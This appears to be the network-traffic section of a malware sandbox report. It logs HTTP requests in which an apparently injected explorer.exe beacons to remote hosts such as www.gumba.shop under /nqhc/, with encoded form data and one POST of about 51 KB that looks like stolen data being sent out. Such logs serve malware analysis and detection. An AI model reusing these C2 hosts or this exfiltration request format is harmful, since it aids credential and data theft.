                                                                                                                                                                          Data Ascii: dYdTXC1620uhEwshDGQ0CRMNhd53tyGzsRTbHlT2HJK8-7e3lnZ98iPQ7CVXhfAme21o5ZKJ4kbYxsmtWoqypyRcsWgdM(DzON7VbDdjKd9emazDMDTgNLnnKhJ~C~fcEvF4sZbYOxiHFdQHT2EMAKyRwzfXBSuQvgLI2vFPwfApfhV14edbEhrZQKxaGRD~_mEupr4Sp0mYNTwqXbFLDjoZMeQL16qVSom8lQPFZT80o3D(Jms
                                                                                                                                                                          Dec 5, 2022 15:19:08.042258978 CET12525OUTData Raw: 4a 61 4b 47 63 6a 53 48 6e 7e 59 69 71 6f 57 33 4f 79 6d 6f 75 4f 54 67 67 4d 44 37 4a 74 6e 33 4b 6c 70 48 35 48 5f 5a 57 28 2d 64 62 46 58 58 4b 46 6a 75 38 66 68 7a 6e 28 66 73 34 7e 76 6f 59 67 37 43 4e 44 6f 46 76 69 44 78 70 67 67 51 4c 39
                                                                                                                                                                          Data Ascii: JaKGcjSHn~YiqoW3OymouOTggMD7Jtn3KlpH5H_ZW(-dbFXXKFju8fhzn(fs4~voYg7CNDoFviDxpggQL9OQjX0zDcMgNxTsMc6dWBIlqIUWtNlkMSXL9WsCMm5m9qruIgO9SvxL2Yac3j7D02EoD2fqRTdaittEE4D2CBHIOMw9pn7ScDfEtj-8ECxWTWEGcDeslL6PWcrMyBvefDhiuVn3-yqybW5NBitv9G479XEFcQ0RKsV
                                                                                                                                                                          Dec 5, 2022 15:19:08.207382917 CET12527OUTData Raw: 34 59 2d 74 6e 59 57 6e 5f 76 44 64 4d 4d 67 34 5a 34 4c 54 36 77 4f 6e 31 44 2d 47 5f 59 50 76 7a 4c 6f 67 46 51 45 41 53 6d 48 72 41 63 73 74 6d 6f 63 61 70 66 4f 69 45 36 59 4c 6b 73 46 64 42 4d 75 59 57 4b 47 7a 41 69 43 35 6e 6c 76 65 61 64
                                                                                                                                                                          Data Ascii: 4Y-tnYWn_vDdMMg4Z4LT6wOn1D-G_YPvzLogFQEASmHrAcstmocapfOiE6YLksFdBMuYWKGzAiC5nlvead3GwPti8EwArUoAYUEm_d0mG5LrA40IJwbICXFqFpkew~eFlGqlmmAMEP3H6I55t266fnpucJnL2ZDLxxbIKPtxWE_efIIXuIp8n7MEFn_sHcmlyOGw7SzK0BgUOaUFLHKxGUoVGBJhgZ0F0s-p0s_c18tDkcSwNZE
                                                                                                                                                                          Dec 5, 2022 15:19:08.207562923 CET12533OUTData Raw: 7a 43 64 47 49 73 70 51 42 51 56 31 68 36 78 62 44 70 44 68 73 6d 69 4d 45 54 36 63 68 67 71 53 4d 73 4c 57 77 51 42 33 58 42 62 61 30 39 70 36 39 6d 44 52 71 62 69 68 63 45 55 5a 56 28 7a 30 76 38 74 41 53 34 77 6f 6c 77 4d 49 41 35 33 33 51 56
                                                                                                                                                                          Data Ascii: zCdGIspQBQV1h6xbDpDhsmiMET6chgqSMsLWwQB3XBba09p69mDRqbihcEUZV(z0v8tAS4wolwMIA533QVhrMM6YpzFKoi9nuZLqgyU0YczjrzSyyKywbF6w8uG3hBH3znk2M5VjNEVCwxsmwO-PO1ZD5BTb6BEe75STDxYyNilaDJlVYqGrhLs9ssZhY3uCudJZEnJLvsVh7y5B6koqWmpT-BhOc2WckQKJq5PMfbS0VrL7gAW
                                                                                                                                                                          Dec 5, 2022 15:19:08.207653999 CET12538OUTData Raw: 70 71 75 43 5f 61 52 66 76 62 6a 28 35 47 54 33 73 55 52 6b 6b 6b 48 49 73 6e 38 54 35 70 35 6a 49 34 51 49 6f 34 6b 36 7a 47 62 50 79 75 4e 47 59 38 65 41 4d 71 39 55 42 73 6b 33 74 46 47 46 2d 7e 54 45 6d 43 6b 78 37 69 6e 57 45 41 56 48 69 62
                                                                                                                                                                          Data Ascii: pquC_aRfvbj(5GT3sURkkkHIsn8T5p5jI4QIo4k6zGbPyuNGY8eAMq9UBsk3tFGF-~TEmCkx7inWEAVHibgiruP00K1pTFVhTeorqKTLsNDtC5VNlQtuhVfnNl_RbFlpw(GgkqWXP8ylSIfYCwkbrTpCwZi4mkPHFf_5BYoG4X5OuiATAQB5dEICKv2uwXsv65LA-H9XBoZxuHLK9nmSvJNou2AN3oD8vHwI7NiS6~FwQ~-pzkV
                                                                                                                                                                          Dec 5, 2022 15:19:08.207878113 CET12539OUTData Raw: 58 65 4b 61 5a 50 70 59 6d 51 76 52 34 4b 46 77 68 30 51 36 4b 50 6e 7a 59 56 53 38 46 6d 50 62 67 31 48 6e 74 53 57 6d 52 70 4b 76 6b 50 79 33 31 34 38 39 43 44 7a 49 71 4b 45 35 45 51 61 6a 56 76 4c 4d 5a 45 53 4d 6d 30 6f 6c 30 78 58 6d 65 54
                                                                                                                                                                          Data Ascii: XeKaZPpYmQvR4KFwh0Q6KPnzYVS8FmPbg1HntSWmRpKvkPy31489CDzIqKE5EQajVvLMZESMm0ol0xXmeTjMcBrl1cvcTJfdKwOJTc8kBOEUQXIE1X61hernJbDG9Ji2QQeU11lgk5H2Fit2zEU5qofnDhvEUGowCdBw65sBTMbWp6Vg0g47bGM9auTMem2K28IkOOs3rvza7Cdbio6LEyMImBqRuaMZGlioWH7CXXSQG6azm0E
                                                                                                                                                                          Dec 5, 2022 15:19:08.405109882 CET12540INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:08 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          71192.168.11.204992338.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:10.062412024 CET12541OUTGET /nqhc/?7nWHV=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.xiaoxiuzhen.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:19:10.230767012 CET12541INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:10 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 1.0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          72192.168.11.204992475.2.81.21280C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:15.251756907 CET12542OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gumba.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gumba.shop
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 64 70 30 6f 68 78 4d 4d 78 31 43 43 63 66 69 6c 50 4e 6b 5f 72 4f 56 4c 52 44 6a 6b 4e 55 41 6a 5a 44 48 75 62 63 57 4c 64 6e 35 46 64 6a 69 5a 51 34 38 4b 38 65 53 56 4f 50 28 2d 6e 39 67 34 6c 57 49 35 6b 31 55 31 78 53 43 31 58 75 41 43 32 31 56 6e 65 31 4f 61 38 30 72 65 39 38 53 5f 62 72 28 4a 28 37 33 50 31 4d 4d 43 71 36 54 67 4b 76 58 54 49 76 79 65 7a 47 61 63 28 30 28 64 4b 58 67 71 52 73 73 34 55 6d 55 32 6b 51 4a 76 61 2d 4f 47 30 6e 56 79 72 71 55 6a 65 33 45 37 4d 44 62 43 33 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=S6tbconk9Vd-dp0ohxMMx1CCcfilPNk_rOVLRDjkNUAjZDHubcWLdn5FdjiZQ48K8eSVOP(-n9g4lWI5k1U1xSC1XuAC21Vne1Oa80re98S_br(J(73P1MMCq6TgKvXTIvyezGac(0(dKXgqRss4UmU2kQJva-OG0nVyrqUje3E7MDbC3w).
                                                                                                                                                                          Dec 5, 2022 15:19:15.304797888 CET12543INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:15 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          73192.168.11.204992575.2.81.21280C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:17.282093048 CET12544OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gumba.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gumba.shop
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 62 35 45 6f 6a 53 30 4d 33 56 43 42 41 76 69 6c 47 74 6b 37 72 4f 5a 4c 52 43 33 30 59 79 51 6a 59 68 66 75 61 5a 36 4c 4f 58 35 46 53 44 69 41 64 59 38 5f 38 65 65 73 4f 4f 44 2d 6e 35 41 34 6b 6b 51 35 74 6c 55 36 37 79 43 30 42 2d 41 42 39 56 56 78 65 31 53 73 38 77 72 65 39 4d 7e 5f 4a 35 6e 4a 73 36 33 4d 34 4d 4d 41 73 36 54 6a 52 5f 58 6a 49 76 33 6a 7a 48 69 69 7e 47 6a 64 4c 7a 51 71 44 63 73 5f 42 6d 55 50 6f 77 4a 2d 4a 2d 75 43 38 47 4e 36 79 62 34 65 54 46 39 56 49 6e 4b 2d 68 47 57 4b 77 7a 54 5f 31 70 67 6c 38 72 79 62 28 36 35 5f 41 73 54 6b 6e 73 69 32 76 32 6d 72 57 5f 73 37 79 57 6f 67 70 56 69 5a 67 65 34 33 30 37 41 31 68 72 73 79 31 51 78 71 55 41 73 4c 39 6b 65 2d 28 6d 7a 61 46 70 72 33 6a 30 50 74 64 79 56 4a 6c 62 67 34 7e 4f 55 7a 57 61 4b 43 38 46 70 53 58 48 55 4b 41 42 32 59 4c 65 6c 41 57 6c 69 44 6c 46 6c 6a 6b 36 76 31 39 72 76 74 64 51 66 6e 4d 65 4f 69 49 4e 57 6a 4d 5f 38 6c 74 63 47 50 4f 4c 48 7a 50 75 30 72 47 66 30 30 61 47 61 6a 7a 46 62 4d 6f 75 72 34 4e 6a 45 35 41 45 55 68 37 68 28 33 74 62 6b 39 6f 49 7a 78 6d 75 79 6f 49 30 34 34 54 2d 77 71 6d 4e 49 61 45 54 53 33 4d 76 71 4c 51 7a 74 51 37 67 61 57 6d 63 4b 4c 6c 74 39 45 63 39 7a 7a 4f 43 4e 79 4d 4c 56 39 4b 47 33 32 31 4b 74 48 75 74 72 38 5a 5a 6d 34 38 42 35 53 75 71 47 65 79 69 4e 30 49 6c 6a 58 68 79 6a 73 34 69 57 64 44 57 36 47 74 41 4a 64 53 39 6b 68 44 46 72 7a 62 44 53 57 38 31 39 49 6a 74 6b 66 48 65 75 6e 62 51 72 71 4b 37 4f 32 52 2d 53 41 53 48 4f 5a 64 41 7e 48 50 4a 79 5f 70 34 63 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=S6tbconk9Vd-b5EojS0M3VCBAvilGtk7rOZLRC30YyQjYhfuaZ6LOX5FSDiAdY8_8eesOOD-n5A4kkQ5tlU67yC0B-AB9VVxe1Ss8wre9M~_J5nJs63M4MMAs6TjR_XjIv3jzHii~GjdLzQqDcs_BmUPowJ-J-uC8GN6yb4eTF9VInK-hGWKwzT_1pgl8ryb(65_AsTknsi2v2mrW_s7yWogpViZge4307A1hrsy1QxqUAsL9ke-(mzaFpr3j0PtdyVJlbg4~OUzWaKC8FpSXHUKAB2YLelAWliDlFljk6v19rvtdQfnMeOiINWjM_8ltcGPOLHzPu0rGf00aGajzFbMour4NjE5AEUh7h(3tbk9oIzxmuyoI044T-wqmNIaETS3MvqLQztQ7gaWmcKLlt9Ec9zzOCNyMLV9KG321KtHutr8ZZm48B5SuqGeyiN0IljXhyjs4iWdDW6GtAJdS9khDFrzbDSW819IjtkfHeunbQrqK7O2R-SASHOZdA~HPJy_p4c.
                                                                                                                                                                          Dec 5, 2022 15:19:17.331285954 CET12544INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:19:17 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a
                                                                                                                                                                          Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx
                                                                                                                                                                          Dec 5, 2022 15:19:17.331347942 CET12544INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          74192.168.11.204992675.2.81.21280C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:19:19.314075947 CET12546OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gumba.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gumba.shop
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 62 35 45 6f 6a 53 30 4d 33 56 43 42 41 76 69 6c 47 74 6b 37 72 4f 5a 4c 52 43 33 30 59 79 59 6a 5a 55 4c 75 62 36 69 4c 66 6e 35 46 4d 54 69 46 64 59 38 59 38 65 33 6b 4f 4f 50 78 6e 5f 4d 34 6b 7a 30 35 74 58 4d 36 7e 79 43 33 66 4f 41 44 32 31 55 74 65 31 4f 34 38 30 48 4f 39 38 61 5f 62 72 76 4a 7e 5a 50 50 67 4d 4d 43 73 36 54 76 56 5f 58 72 49 76 37 4e 7a 48 75 69 7e 45 58 64 4b 43 73 71 42 72 59 5f 5a 47 55 4d 69 51 4a 37 65 75 76 36 38 47 59 4a 79 62 34 4f 54 45 35 56 49 67 65 2d 67 48 57 4c 7e 7a 54 5f 32 70 67 6d 34 72 75 66 28 36 6b 71 41 73 33 6b 6e 72 6d 32 7e 6d 6d 72 48 71 41 38 6b 6d 6f 6d 7e 6c 6a 66 6b 65 38 5f 30 37 46 47 68 70 41 79 32 67 4e 71 56 7a 30 4c 75 56 65 2d 6a 57 7a 59 4a 35 72 6f 32 45 4f 70 64 78 39 7a 6c 62 42 4e 7e 4e 59 7a 58 37 47 43 35 6e 4e 54 52 6e 55 4d 4d 68 32 4a 41 2d 34 50 57 68 47 66 6c 46 6c 7a 6b 34 44 31 36 62 66 74 63 53 6e 6b 50 4f 4f 6c 45 74 58 37 48 66 77 6a 74 63 71 48 4f 4b 50 6a 50 74 59 72 55 76 30 30 52 41 54 31 39 31 62 50 71 75 72 51 41 44 46 5f 41 45 51 4c 37 6c 6e 6e 74 4c 59 39 70 35 44 78 33 75 79 6e 4f 55 34 38 5a 65 77 6f 69 4e 49 61 45 54 66 47 4d 76 6d 4c 51 43 46 51 35 54 79 57 32 61 43 4c 6e 74 39 34 63 39 7a 59 4f 43 52 5f 4d 4c 64 66 4b 47 47 62 31 50 64 48 33 5a 50 38 59 62 4f 37 33 68 35 74 6b 4b 47 33 32 6a 77 79 49 6c 28 6c 68 79 7a 57 34 52 53 64 43 57 71 47 28 77 4a 65 58 64 6b 71 55 31 72 6c 4d 54 65 30 38 78 6b 39 6a 73 67 70 48 65 47 6e 66 47 43 75 50 5f 4b 41 49 4e 44 70 53 42 53 71 64 57 32 32 4b 4e 4f 59 71 65 71 2d 4d 4b 78 44 31 34 42 65 58 43 4d 37 6a 45 49 41 65 59 51 4f 41 7a 41 53 59 49 68 32 44 72 58 4e 64 56 32 73 49 6c 61 75 6b 73 35 37 5a 78 33 63 53 42 4f 5a 41 62 4c 6b 6d 4d 4a 53 39 5f 34 30 78 4a 54 72 75 79 6d 64 71 78 32 48 4f 43 41 55 55 39 39 7a 57 53 31 2d 6d 49 70 52 39 61 58 5a 44 63 59 4e 6a 72 4b 4d 38 58 6a 68 73 55 6c 67 46 71 30 6b 7a 53 4f 46 47 56 4a 5f 68 6a 59 79 44 53 6f 4d 52 68 36 77 64 53 54 4e 59 47 41 65 79 63 6d 56 56 70 45 5f 6f 36 6b 46 6d 6f 38 43 76 5f 38 30 35 5a 33 33 70 39 6d 68 67 67 49 64 42 6c 41 56 65 62 6e 44 42 77 70 6f 41 46 67 56 58 2d 75 74 33 42 57 4a 5a 2d 6f 6e 6a 64 50 35 38 6e 55 52 79 73 54 53 66 4f 4b 56 36 4a 77 68 67 64 63 70 65 49 46 6b 61 37 34 6a 36 2d 57 5a 64 6f 70 71 28 41 43 4f 53 57 5a 6e 6e 51 51 6e 50 66 46 50 6b 4d 28 51 63 4d 4a 64 57 2d 76 56 74 72 68 31 54 61 6c 51 44 38 72 79 49 32 36 37 33 45 54 6f 28 77 64 59 74 69 46 48 41 79 58 4e 31 6d 71 56 78 6c 69 46 74 71 51 55 4f 31 74 54 78 2d 35 4e 35 73 55 6b 42 4f 62 4e 4f 67 46 33 7e 61 57 61 50 6e 65 58 58 6a 72 6d 70 4c 65 68 4f 49 37 4b 71 58 46 44 39 74 71 6e 74 56 28 74 56 77 56 31
                                                                                                                                                                          Data Ascii: 7nWHV=S6tbconk9Vd-b5EojS0M3VCBAvilGtk7rOZLRC30YyYjZULub6iLfn5FMTiFdY8Y8e3kOOPxn_M4kz05tXM6~yC3fOAD21Ute1O480HO98a_brvJ~ZPPgMMCs6TvV_XrIv7NzHui~EXdKCsqBrY_ZGUMiQJ7euv68GYJyb4OTE5VIge-gHWL~zT_2pgm4ruf(6kqAs3knrm2~mmrHqA8kmom~ljfke8_07FGhpAy2gNqVz0LuVe-jWzYJ5ro2EOpdx9zlbBN~NYzX7GC5nNTRnUMMh2JA-4PWhGflFlzk4D16bftcSnkPOOlEtX7HfwjtcqHOKPjPtYrUv00RAT191bPqurQADF_AEQL7lnntLY9p5Dx3uynOU48ZewoiNIaETfGMvmLQCFQ5TyW2aCLnt94c9zYOCR_MLdfKGGb1PdH3ZP8YbO73h5tkKG32jwyIl(lhyzW4RSdCWqG(wJeXdkqU1rlMTe08xk9jsgpHeGnfGCuP_KAINDpSBSqdW22KNOYqeq-MKxD14BeXCM7jEIAeYQOAzASYIh2DrXNdV2sIlauks57Zx3cSBOZAbLkmMJS9_40xJTruymdqx2HOCAUU99zWS1-mIpR9aXZDcYNjrKM8XjhsUlgFq0kzSOFGVJ_hjYyDSoMRh6wdSTNYGAeycmVVpE_o6kFmo8Cv_805Z33p9mhggIdBlAVebnDBwpoAFgVX-ut3BWJZ-onjdP58nURysTSfOKV6JwhgdcpeIFka74j6-WZdopq(ACOSWZnnQQnPfFPkM(QcMJdW-vVtrh1TalQD8ryI2673ETo(wdYtiFHAyXN1mqVxliFtqQUO1tTx-5N5sUkBObNOgF3~aWaPneXXjrmpLehOI7KqXFD9tqntV(tVwV1
                                                                                                                                                                          Dec 5, 2022 15:19:19.314146996 CET12556OUTData Raw: 6e 72 28 5a 7e 6e 39 33 73 73 37 45 37 35 6f 56 4b 56 79 59 71 38 30 52 53 52 66 63 67 73 66 44 33 4d 31 44 78 44 34 4a 70 6b 38 37 46 48 52 2d 53 4e 76 2d 37 34 32 41 48 47 4c 62 45 44 34 74 46 4a 4f 47 4a 5a 38 68 48 31 4d 4b 58 52 76 69 30 52
                                                                                                                                                                          Data Ascii: nr(Z~n93ss7E75oVKVyYq80RSRfcgsfD3M1DxD4Jpk87FHR-SNv-742AHGLbED4tFJOGJZ8hH1MKXRvi0RW1FHTNqASM(pXgQ6CREuJky8ta0oprqaF_ZDAbzY0mZtw_9ZZEMQRhQqjS7Pgd8eXVKwxhnMyMKuEbOxYt3unDrSXmUtfAxcJ2eTh22mSoLcC91eWGYct7rd5amcSke9AtVe19fDm314MCKfm_HTgeRkGROCgkYWc
                                                                                                                                                                          Dec 5, 2022 15:19:19.314193010 CET12558OUTData Raw: 55 45 5a 46 47 4e 37 79 74 6b 71 6d 43 35 79 6c 63 37 28 58 56 59 79 6b 77 37 4e 44 59 6a 67 65 6a 64 62 6b 47 45 36 70 6c 78 6b 55 38 55 30 75 65 32 46 42 52 31 5a 79 74 45 77 53 6d 7a 51 69 75 45 46 36 32 5a 57 55 56 4c 53 58 70 5a 4a 70 58 47
                                                                                                                                                                          Data Ascii: UEZFGN7ytkqmC5ylc7(XVYykw7NDYjgejdbkGE6plxkU8U0ue2FBR1ZytEwSmzQiuEF62ZWUVLSXpZJpXGpxFgS-xVmba2meeAuUmwPZAyYdzu4rDbP-gmM6pzXbSe68azgNmc8-KRSZQ0Onqdb1hJqAgt(heDowxbB4Bdypq0UtcjjtsGhoC25BqoyMdqtNU7ClopMW1pvw4OHxtWJRzAM_25IhgrMIsHqjcQDg62JCwLirGSa
                                                                                                                                                                          Dec 5, 2022 15:19:19.325036049 CET12560OUTData Raw: 59 64 79 4c 7e 38 48 77 66 47 79 63 6b 57 6a 35 7a 57 75 72 34 62 6e 6c 47 45 47 78 64 4f 35 43 78 6f 72 62 5a 63 34 4d 61 6a 50 54 6b 54 38 42 65 33 78 68 41 35 64 79 72 79 77 54 28 4c 5a 36 6e 59 48 34 36 61 59 49 70 45 7a 4a 6f 4b 6d 65 78 79
                                                                                                                                                                          Data Ascii: YdyL~8HwfGyckWj5zWur4bnlGEGxdO5CxorbZc4MajPTkT8Be3xhA5dyrywT(LZ6nYH46aYIpEzJoKmexy7NWUJKoCeAWaf8BpR4WsZ-iUxYtbufmwoq0WA2IuRyfjtgYrzJmIKZBTYlv0C7cLINUWWYPKOhcqLOMcSRJ2scrBrsoVIkbPNR93k3WuoZF4HAWFfvzy6XfB~b99uwByn_w-PZgbzxi03eOF2h1H3eYgC7z8Uk2Ek
                                                                                                                                                                          Dec 5, 2022 15:19:19.325089931 CET12566OUTData Raw: 6c 77 79 63 77 77 49 31 66 50 32 56 30 53 4d 56 45 52 28 45 72 34 64 55 70 79 45 4c 6b 49 6b 32 54 4a 63 55 48 69 4a 41 70 75 55 50 7a 76 76 77 4b 31 53 4d 6c 49 7e 4a 6c 46 52 78 48 31 35 59 4a 52 7e 41 48 64 56 33 74 6a 47 66 52 63 54 35 49 55
                                                                                                                                                                          Data Ascii: lwycwwI1fP2V0SMVER(Er4dUpyELkIk2TJcUHiJApuUPzvvwK1SMlI~JlFRxH15YJR~AHdV3tjGfRcT5IU39ORLa8L0Jwk~Nncrv5oQpChc7eeYbeyfOo8JGv_Cazo9ML4PQK5XJFGN3JY(sc16kx5AxF6C0JDSIctjba2gsrTRhqWo6ya7fot7NAISEg3~iJbcxiTPMATod9etoCqn1TNrRwfs85bPbo4vV77viVSx28MsNcNp
                                                                                                                                                                          Dec 5, 2022 15:19:19.325345039 CET12571OUTData Raw: 68 47 65 39 6b 55 78 31 32 68 74 75 42 77 28 55 74 7a 51 64 37 72 69 6f 6e 54 6e 56 73 49 70 2d 73 37 73 57 44 33 63 54 31 33 67 6e 72 77 73 4b 31 69 35 59 41 4e 54 68 33 42 73 4c 71 35 43 73 4b 75 6d 44 61 62 4d 62 7e 34 4d 61 79 72 32 34 62 35
                                                                                                                                                                          Data Ascii: hGe9kUx12htuBw(UtzQd7rionTnVsIp-s7sWD3cT13gnrwsK1i5YANTh3BsLq5CsKumDabMb~4Mayr24b586nMArubP7zcIvY2zyPLOqz3FB(9HN9UddiG~HtDNrVeIt62fwwifTQkWE4b5GqNc4BfihuBpCb04lb-L6oTkffc(iAlRJk206NvSEkGRzhvvyTC(orfKpsYk2Ks(-~AduZ1MZcRQOSLtL8aaW~m1a5pJdOMLi3zP
                                                                                                                                                                          Dec 5, 2022 15:19:19.325524092 CET12583OUTData Raw: 50 5f 54 6e 57 31 41 42 33 4f 6d 6d 39 77 71 70 38 33 70 50 59 2d 38 55 6a 44 6c 45 44 45 35 5f 72 70 77 47 69 35 57 56 38 78 7a 38 76 6c 46 35 56 41 61 58 6a 35 6b 4a 68 77 35 2d 44 68 79 4f 37 51 67 63 79 42 4e 53 34 6f 6e 51 43 68 49 59 45 54
                                                                                                                                                                          Data Ascii: P_TnW1AB3Omm9wqp83pPY-8UjDlEDE5_rpwGi5WV8xz8vlF5VAaXj5kJhw5-DhyO7QgcyBNS4onQChIYETRojsLgBKnPgqeYA3WA1IPJGKTxNhR-r1xxKJN-Znq87QrgQDp1cUf4E97NLr3qhTUF1OzfLudBDF6o0aS9tNhZ(92I08dLi25vV_RFlm90hePQLeaICNFbLZjiQLrdwoWmwemB5-IAhD4Bbfu8GWGpaTRK2nLrKwJ
                                                                                                                                                                          Dec 5, 2022 15:19:19.335951090 CET12585OUTData Raw: 36 6f 63 77 37 65 79 68 53 6b 31 6d 71 70 7a 6b 78 6c 77 7a 79 5f 61 52 32 33 5a 65 47 33 49 31 65 75 45 76 52 6e 45 76 6b 6e 62 64 4b 59 46 44 62 57 35 55 6d 32 62 35 46 62 43 67 79 63 6e 61 54 52 5a 74 74 4a 79 47 49 48 74 78 45 74 45 4d 4c 66
                                                                                                                                                                          Data Ascii: 6ocw7eyhSk1mqpzkxlwzy_aR23ZeG3I1euEvRnEvknbdKYFDbW5Um2b5FbCgycnaTRZttJyGIHtxEtEMLf6xEOtz(MmrrnC1o34zWIK_u4lm71wr8SLtsjhiyL~y(d8RHeZnvLF2LjDaJIRWVOK8rldgeDYY3cyry_zstJiIJfDS4D5YprFOGKD0ZfqRE51eeyMmNit46dWr55Qq2RMf3SvD6yEqsWIPMfI7p8ZAA9XcFAXqWZ8
